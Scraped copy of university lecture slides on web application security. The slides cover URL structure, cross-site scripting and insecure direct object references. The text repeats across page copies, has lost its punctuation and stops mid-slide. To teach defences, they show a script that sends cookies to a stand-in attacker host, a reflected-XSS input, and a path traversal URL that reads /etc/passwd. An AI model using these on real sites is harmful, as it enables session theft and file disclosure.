38
Secure Programming Lecture 11: Web Application Security II David Aspinall 26th February 2016

Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

  • Upload
    others

  • View
    1

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Secure Programming Lecture 11Web Application Security II

David Aspinall

26th February 2016

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Recap

Programming web applications securely is perhapsthe most important case of secure programming today

Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the riseEacute web becomes UI for DevOps sysadmin

Eacute Web technologies are ubiquitousEacute HTML5JavaScript as a platformEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)

Although JS has serious drawbacks as a programming language atleast it provides memory safety

OWASP Top 10 List

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 2: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Recap

Programming web applications securely is perhapsthe most important case of secure programming today

Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the riseEacute web becomes UI for DevOps sysadmin

Eacute Web technologies are ubiquitousEacute HTML5JavaScript as a platformEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)

Although JS has serious drawbacks as a programming language atleast it provides memory safety

OWASP Top 10 List

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 3: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Recap

Programming web applications securely is perhapsthe most important case of secure programming today

Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the riseEacute web becomes UI for DevOps sysadmin

Eacute Web technologies are ubiquitousEacute HTML5JavaScript as a platformEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)

Although JS has serious drawbacks as a programming language atleast it provides memory safety

OWASP Top 10 List

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

